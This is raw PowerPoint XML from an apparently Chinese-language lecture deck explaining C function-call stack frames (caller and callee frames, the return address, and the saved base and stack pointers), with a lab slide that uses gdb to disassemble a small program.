          <p:cNvPr id="43" name="正方形/長方形 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7987912" y="2307692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1999810" y="2026623"/>
            <a:ext cx="441150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Caller Function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1999809" y="4264065"/>
            <a:ext cx="4411500" cy="24756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1999810" y="4268133"/>
            <a:ext cx="4425753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Callee</a:t>
            </a:r>
            <a:r>
              <a:rPr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Function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2128268" y="4925566"/>
            <a:ext cx="3868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void add(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400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n1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400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n2){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr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 </a:t>
            </a:r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sum;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 sum = n1 + n2;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}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7861444" y="5867612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２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7861443" y="5386296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1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861442" y="4898101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Return Address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18" name="直線矢印コネクタ 17"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="19" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5607269" y="4632980"/>
            <a:ext cx="2254172" cy="57752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7861442" y="4416785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Saved BP(Main)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="14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678973" y="152144"/>
            <a:ext cx="9341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Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" alt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altLang="ja-JP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Frame</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="32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7360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正方形/長方形 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836682" y="1962109"/>
            <a:ext cx="8557701" cy="4840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7310190" y="2207839"/>
            <a:ext cx="2768874" cy="246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776094" y="2369057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310191" y="2207839"/>
            <a:ext cx="2637139" cy="246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999809" y="2026623"/>
            <a:ext cx="4411500" cy="21743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285408" y="2538875"/>
            <a:ext cx="3868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main(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr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 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add(1,2);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 return 0;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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="正方形/長方形 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7987912" y="2307692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1999810" y="2026623"/>
            <a:ext cx="441150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Caller Function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1999809" y="4264065"/>
            <a:ext cx="4411500" cy="24756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1999810" y="4268133"/>
            <a:ext cx="4425753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Callee</a:t>
            </a:r>
            <a:r>
              <a:rPr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Function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2128268" y="4925566"/>
            <a:ext cx="3868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void add(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400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n1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400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n2){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr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 </a:t>
            </a:r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sum;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 sum = n1 + n2;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}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7861444" y="5867612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２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7861443" y="5386296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1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861442" y="4898101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Return Address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18" name="直線矢印コネクタ 17"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="19" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5607269" y="4632980"/>
            <a:ext cx="2254172" cy="57752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7861442" y="4416785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Saved BP(Main)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8667500" y="3248276"/>
            <a:ext cx="1890011" cy="920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574484" y="3269147"/>
            <a:ext cx="19830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Base Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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2" name="直線コネクタ 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8815574" y="3826347"/>
            <a:ext cx="0" cy="550878"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="571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1678973" y="152144"/>
            <a:ext cx="9341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Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" alt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altLang="ja-JP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Frame</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="32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8640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正方形/長方形 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836682" y="1962109"/>
            <a:ext cx="8557701" cy="4840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7310190" y="2207839"/>
            <a:ext cx="2768874" cy="246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776094" y="2369057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310191" y="2207839"/>
            <a:ext cx="2637139" cy="246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999809" y="2026623"/>
            <a:ext cx="4411500" cy="21743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285408" y="2538875"/>
            <a:ext cx="3868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main(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr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 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add(1,2);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 return 0;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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="正方形/長方形 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7987912" y="2307692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1999810" y="2026623"/>
            <a:ext cx="441150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Caller Function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1999809" y="4264065"/>
            <a:ext cx="4411500" cy="24756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1999810" y="4268133"/>
            <a:ext cx="4425753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Callee</a:t>
            </a:r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Function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2128268" y="4925566"/>
            <a:ext cx="3868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void add(</a:t>
            </a:r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n1, </a:t>
            </a:r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n2){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400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sum;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0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 sum = n1 + n2;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}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7861444" y="5867612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２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7861443" y="5386296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1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861442" y="4898101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Return</a:t>
            </a:r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Address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7861442" y="4416785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Saved BP(Main)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="14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7861441" y="3939278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sum=3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V="1">
            <a:off x="4320266" y="4145781"/>
            <a:ext cx="3541175" cy="145671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1678973" y="152144"/>
            <a:ext cx="9341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Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" alt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altLang="ja-JP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Frame</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="32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5129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正方形/長方形 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836682" y="1962109"/>
            <a:ext cx="8557701" cy="4840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7310190" y="2207839"/>
            <a:ext cx="2768874" cy="246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776094" y="2369057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310191" y="2207839"/>
            <a:ext cx="2637139" cy="246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999809" y="2026623"/>
            <a:ext cx="4411500" cy="21743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285408" y="2538875"/>
            <a:ext cx="3868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main(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr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 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add(1,2);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 return 0;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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="正方形/長方形 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7987912" y="2307692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1999810" y="2026623"/>
            <a:ext cx="441150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Caller Function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1999809" y="4264065"/>
            <a:ext cx="4411500" cy="24756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1999810" y="4268133"/>
            <a:ext cx="4425753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Callee</a:t>
            </a:r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Function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2128268" y="4925566"/>
            <a:ext cx="3868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void add(</a:t>
            </a:r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n1, </a:t>
            </a:r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n2){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr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 </a:t>
            </a:r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sum;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 sum = n1 + n2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0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}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7861444" y="5867612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２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7861443" y="5386296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1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861442" y="4898101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Return Address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7861442" y="4416785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Saved BP(Main)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="14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7845974" y="3939278"/>
            <a:ext cx="193161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sum=3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028629" y="5575975"/>
            <a:ext cx="2476216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rgbClr val="FF3399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Restore the BP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3399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(&amp; Stack Pointer)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 flipH="1">
            <a:off x="7222535" y="4691632"/>
            <a:ext cx="748214" cy="103392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1678973" y="152144"/>
            <a:ext cx="9341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Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" alt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altLang="ja-JP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Frame</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="32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34559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正方形/長方形 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836682" y="1962109"/>
            <a:ext cx="8557701" cy="4840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7310190" y="2207839"/>
            <a:ext cx="2768874" cy="246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776094" y="2369057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310191" y="2207839"/>
            <a:ext cx="2637139" cy="246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999809" y="2026623"/>
            <a:ext cx="4411500" cy="21743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285408" y="2538875"/>
            <a:ext cx="3868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main(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr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 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add(1,2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0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 return 0;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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="正方形/長方形 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7987912" y="2307692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1999810" y="2026623"/>
            <a:ext cx="441150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Caller Function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1999809" y="4264065"/>
            <a:ext cx="4411500" cy="24756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1999810" y="4268133"/>
            <a:ext cx="4425753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Callee</a:t>
            </a:r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Function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2128268" y="4925566"/>
            <a:ext cx="3868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void add(</a:t>
            </a:r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n1, </a:t>
            </a:r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n2){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr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 </a:t>
            </a:r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sum;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 sum = n1 + n2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0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}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7861444" y="5867612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２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7861443" y="5386296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1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861442" y="4898101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Return Address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7861442" y="4416785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Saved BP(Main)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="14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7845974" y="3939278"/>
            <a:ext cx="193161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sum=3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4" name="直線矢印コネクタ 23"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3973190" y="3550541"/>
            <a:ext cx="3872784" cy="159851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5150069" y="5090582"/>
            <a:ext cx="2533756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339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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF339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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF339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Return Address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF3399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algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF339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返回到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF339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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF339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Caller </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF339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Funcion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF339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(Main)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF339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的下一個指令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF3399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678973" y="152144"/>
            <a:ext cx="9341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Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" alt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altLang="ja-JP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Frame</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="32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0078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77334" y="4967427"/>
            <a:ext cx="10021321" cy="493712"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> apt-get install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>gcc-multilib</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0">
              <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p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5</a:t>
            </a:fld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7315E393-3361-3943-A476-7819D8BB2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47" y="1910704"/>
            <a:ext cx="9245600" cy="2476500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="標題 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E018C3BB-A21C-3442-B0A2-46DE9DC72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964" y="664439"/>
            <a:ext cx="7038699" cy="956153"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>請先安裝</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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415951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正方形/長方形 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836682" y="1962109"/>
            <a:ext cx="8557701" cy="4840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7310190" y="2207839"/>
            <a:ext cx="2768874" cy="246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776094" y="2369057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310191" y="2207839"/>
            <a:ext cx="2637139" cy="246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7987912" y="2307692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7861444" y="5867612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２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7861443" y="5386296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1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861442" y="4898101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Return address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7861442" y="4416785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Saved BP(Main)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="14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7845974" y="3939278"/>
            <a:ext cx="193161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sum=3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2" name="直線コネクタ 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2525110" y="5358857"/>
            <a:ext cx="7329950" cy="292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H="1">
            <a:off x="7411723" y="3733871"/>
            <a:ext cx="699" cy="1547694"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FF3399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H="1" flipV="1">
            <a:off x="7401620" y="5395195"/>
            <a:ext cx="10102" cy="990198"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FF3399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テキスト ボックス 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4133314" y="4406530"/>
            <a:ext cx="3460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Callee</a:t>
            </a:r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Function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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lang="zh-CN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的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="24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StackFrame</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="24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230149" y="5474796"/>
            <a:ext cx="3460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Caller Function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="24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en-US" altLang="ja-JP" sz="24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StackFrame</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="24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678973" y="152144"/>
            <a:ext cx="9341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Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" alt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altLang="ja-JP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Frame</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="32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61618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42FF2A-15AD-EA49-BE8B-751982C84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kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Lab2</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>觀察子程式呼叫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177227-3DD6-914B-8306-006B4531C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749323"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> lab2.out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>disassemble main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>disassemble </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>func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FB79A9-F89B-1C4C-B5AE-5EB7B0716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276" y="0"/>
            <a:ext cx="8447855" cy="68427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3B62C71-2952-0449-BDC7-7DA146081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4017408"/>
            <a:ext cx="22606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027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A795EE8D-EA6F-4844-A62C-A8784661B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93" b="5274"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10583"/>
            <a:ext cx="6803136" cy="4150439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="正方形/長方形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22ADF5F9-2C8A-5E42-A684-05FB13EF3D5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7900272" y="1759457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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{824222BD-FBA4-0B45-B59A-EB421C78A5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8112090" y="1698092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1" name="正方形/長方形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C199D0FF-D518-6940-8499-A7C05EBE75F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7985621" y="4776695"/>
            <a:ext cx="1908265" cy="901615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Ｍ</a:t>
            </a:r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ain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Frame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8" name="正方形/長方形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8BE8C5B-BBF2-3647-B6BA-454AB0D6D353}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3668889" y="5082498"/>
            <a:ext cx="2384437" cy="8925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9" name="テキスト ボックス 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB4E3591-BE59-6840-AAC4-C5CECEF8119E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3668889" y="5091289"/>
            <a:ext cx="26089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Base Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F2267D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（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F2267D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位子）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B00ACBBA-20C5-7145-96FA-C3E1785A5B4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5953650" y="5678311"/>
            <a:ext cx="1861270" cy="0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B3B5C61-7E16-5A41-915F-2097797B6E21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828618" y="4550334"/>
            <a:ext cx="26444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HelveticaNeue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>呼叫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0">
                <a:latin typeface="HelveticaNeue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="HelveticaNeue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>前</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-TW" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="正方形/長方形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88397F16-EB7F-42D6-B7D2-49A0E5C540B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10112104" y="4485946"/>
            <a:ext cx="2384437" cy="916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17" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2002548C-F3C4-411B-ACF6-F07D3E365BC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9661866" y="4804083"/>
            <a:ext cx="638710" cy="12838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テキスト ボックス 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B52D7662-D636-48AA-A219-6ABDABA50681}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10175011" y="4509535"/>
            <a:ext cx="21980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 Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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Esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F2267D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5" name="直線コネクタ 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F178F99-A777-4C95-A5B2-B7356A70CD64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6044390" y="794971"/>
            <a:ext cx="638710" cy="12838"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="FFFF0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1561420E-B7CF-47D1-B986-B4792364F4C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="940552"/>
            <a:ext cx="680313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065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045702E5-AE36-4F5F-A572-C768BC101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93" b="5274"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10583"/>
            <a:ext cx="6803136" cy="4150439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="正方形/長方形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22ADF5F9-2C8A-5E42-A684-05FB13EF3D5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7900272" y="1759457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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
